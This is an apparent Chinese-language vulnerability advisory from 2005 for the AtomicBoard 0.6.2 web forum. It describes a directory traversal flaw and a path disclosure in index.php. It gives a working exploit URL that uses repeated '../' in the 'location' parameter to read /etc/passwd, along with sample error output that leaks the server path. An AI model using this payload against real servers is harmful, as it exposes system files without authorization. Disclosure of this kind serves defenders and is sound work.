添加时间:
2005-08-16

系统编号:
WAVDB-00357
BUGTRAQ: 8236

影响版本:
AtomicBoard 0.6.2

程序介绍:

AtomicBoard是开放源代码基于WEB的论坛程序。

漏洞分析:

AtomicBoard不正确处理用户提交的URI请求，远程攻击者可以利用这个漏洞以WEB权限在系统上查看任意文件内容。

攻击者提交包含多个 ../ 字符的URI请求，可以绕过WEB限制，以WEB进程权限在系统上查看任意文件内容。

另外index.php对参数处理不正确，可导致路径泄露。

漏洞利用:

http://server/atomicboard/index.php?location=../../../../../../etc/passwd

http://server/AtomicBoard-0.6.2/index.php?location=anything

Class.TemplateEngine::loadFile: file not found
(/www/webs/groovy.no-ip.com/AtomicBoard-0.6.2/include/anything)

解决方案:
厂商补丁：
AtomicBoard
-----------
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：
http://cal007300.student.utwente.nl/atomicboard/

信息来源:
<*来源：gr00vy （groovy2600@yahoo.com.ar）
链接：http://marc.theaimsgroup.com/?l=bugtraq&m=105880585131803&w=2
*>